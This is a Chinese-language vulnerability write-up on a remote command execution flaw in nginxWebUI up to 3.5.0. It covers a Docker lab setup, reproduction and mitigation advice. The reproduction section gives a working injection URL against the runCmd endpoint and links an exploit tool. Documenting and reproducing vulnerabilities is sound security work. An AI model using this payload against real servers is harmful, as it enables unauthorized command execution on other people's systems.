nginxWebUI runCmd前台远程命令执行漏洞

0x01 简介

nginxWebUI是一款图形化管理nginx配置的工具, 可以使用网页来快速配置nginx的各项功能, 包括http协议转发,tcp协议转发, 反向代理, 负载均衡, 静态html服务器, ssl证书自动申请、续签、配置等, 配置好后可一建生成nginx.conf文件, 同时可控制nginx使用此文件进行启动与重载, 完成对nginx的图形化控制闭环.

0x02 漏洞概述

nginxWebUI由于未对用户的输入进行严格过滤，导致任意命令执行漏洞。

该漏洞利用条件简单，漏洞危害较高。

0x03 影响版本

nginxWebUI <= 3.5.0

0x04 环境搭建

docker搭建 可参考https://www.nginxwebui.cn/product.html

docker pull cym1102/nginxwebui:3.4.8

docker images

docker run -d -p 8080:8080 172b6946cdb0

启动后，用netstat -anltp 查看8080端口是否打开，打开后即可访问

0x05 漏洞复现

利用POC进行检测

url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx

此时证明漏洞存在，测试下能否执行命令回显： PS:特殊字符需URL编码

利用EXP脚本实现命令行攻击

漏洞利用工具下载地址

https://github.com/crow821/crowsec

0x06 修复方式

临时缓解方案

该漏洞属于命令拼接漏洞，所以可使用WAF进行防护。但是低版本同时存在权限绕过问题，该问题使用防护设备无法缓解。建议如非必要，不要将该系统暴露在互联网上。

升级修复方案

官方已发布了新版本修复了权限绕过漏洞，并且在一定程度上缓解了远程命令执行的风险。建议用户前往官网更新至最新版本

nginxWebUI - 首页

另外由于官方过滤用户输入的方式并不严格，导致后台可能依旧存在命令执行的风险，可通过使用强口令降低风险。

参考链接

https://mp.weixin.qq.com/s/5N89pINE9SmpMFUoVJlgbA 

https://mp.weixin.qq.com/s/ho-xdGahg9kcUl1dYmDZGQ